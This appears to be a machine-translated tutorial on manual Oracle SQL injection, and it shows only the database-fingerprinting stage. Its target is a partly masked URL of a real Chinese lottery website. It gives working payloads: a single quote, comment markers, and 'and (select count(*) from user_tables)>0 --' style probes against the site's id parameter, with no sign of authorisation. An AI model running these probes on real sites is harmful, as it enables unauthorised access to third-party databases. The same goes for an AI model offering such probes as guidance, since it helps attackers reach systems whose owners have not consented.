A lottery online website is a large lottery site with an injection point. The link is as follows: http: // www. ***** china.com/jst/md_end.jsp? Id = 76. This injection point is used as an example to explain how to perform manual Oracle injection attack detection.
Determine injection points
Add a single quotation mark after the link address, return information "java. SQL. SQLException: ORA-01756", can be initially determined as the Oracle database.
Add "/*" after the link and return the error page, indicating that the database is not MySQL. Add "--" after the injection point link. The normal page is displayed, indicating that the database may be MSSQL or Oracle. Submit again:
Http: // www. **** china.com/jst/md_end.jsp? Id = 76 and (select count (*) from user_tables)> 0 --
Http: // www. **** china.com/jst/md_end.jsp? Id = 76 and (select count (*) from dual)> 0 --
Are returned to the normal page figure 1), confirm as the Oracle database.
Figure 1 Confirm Oracle Injection